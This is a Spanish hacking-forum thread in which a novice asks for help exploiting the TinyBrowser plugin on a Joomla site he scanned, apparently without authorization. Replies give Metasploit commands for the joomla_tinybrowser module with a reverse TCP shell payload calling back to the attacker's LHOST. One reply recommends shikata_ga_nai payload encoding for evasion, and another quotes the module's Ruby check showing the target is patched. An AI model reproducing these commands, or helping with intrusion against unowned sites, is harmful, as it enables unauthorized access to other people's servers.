comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Ayuda con exploit para Joomla

  • 8 Respuestas
  • 3460 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« en: Julio 18, 2013, 04:47:04 am »
Hola a todos  :) he analizado una pagina en joomla y me dice que este plugin  TinyMCE TinyBrowser (creo que es plugin xD ) es vulnerable entonces voy a metasploit y hay un exploit para ese pero al lanzarlo me da este error "[-] Error retrieving obfuscation code!"  :-X no se a que se refiere asi que si alguien sabe que me ayude un poco  :-[
« Última modificación: Agosto 30, 2014, 09:16:54 am por Expermicid »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Julio 18, 2013, 07:03:36 am »
Mmmm podrías decirme el nombre del exploit? es este?
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploit

Pones todos los datos correctamente?

Puedes ver el código desde aquí y así ves donde te salta el error: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Un saludo.



Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #2 en: Julio 18, 2013, 10:19:45 am »
Lo que tienes que hacer es ofuscar el codigo, de tu payload ya que eso es lo que necesitas.

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #3 en: Julio 18, 2013, 09:54:33 pm »
Este es "exploit/unix/webapp/joomla_tinybrowser" y como puedo ofuscar el codigo??  ??? soy muy novato

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #4 en: Julio 19, 2013, 02:35:04 pm »
Te dije el payload -_-! que ofusques revisa sobre MSFVENOM MSFENCODE ;)

Encoding: x86/shikata_ga_nai este es el mas usado

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #5 en: Julio 19, 2013, 04:15:42 pm »
jajaja ok  ;D gracias por responder  :)

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Julio 19, 2013, 08:49:58 pm »
No de echo el error lo que marca es que la ofuscacion de codigo fallo asi que tienes que desactivarla xD, eso es comun por que no funciona con php xD
asi que es un error del metasploit solo quita esa opcion y mandalo directo y jala tambien el tiny se puede hacer explotacion a mano :p no es nada dificil
« Última modificación: Julio 20, 2013, 10:27:56 am por Snifer »
El conocimiento es libre...
La información no lo es xD

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #7 en: Julio 19, 2013, 11:30:45 pm »
 :o Me puedes pasar el exploit o explicarme como hacerlo a mano  ;D

Desconectado Psymera

  • *
  • Underc0der
  • Mensajes: 75
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Julio 20, 2013, 04:23:53 am »
Bien nadie le dio una leida al codigo, lo que sale aqui es que esta parchado
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
        if (res)
             
            if(res.body =~ /"obfus", "((\w)+)"\)/)
                obfuscation_code = $1
                print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
            else
                print_error("Error retrieving obfuscation code!")
                return
            end
        end

por eso te sale del codigo de ofuscacion y muere es un codigo que se ocupa para que sea valida la peticion si entras manualmente al lugar te va a mandar al cuerno en pocas palabras esta parchado No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Julio 20, 2013, 10:28:32 am por Snifer »
El conocimiento es libre...
La información no lo es xD

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 7786
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 4758
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
Cómo uso la "/" para hacer un select en una tabla

Iniciado por tetano32

Respuestas: 3
Vistas: 996
Último mensaje Diciembre 20, 2017, 04:41:12 pm
por tetano32
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 387
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
¿Qué sistema operativo sería recomendable para un "core 2 duo"?

Iniciado por adragon

Respuestas: 4
Vistas: 1614
Último mensaje Febrero 18, 2017, 10:13:04 am
por Linuxero40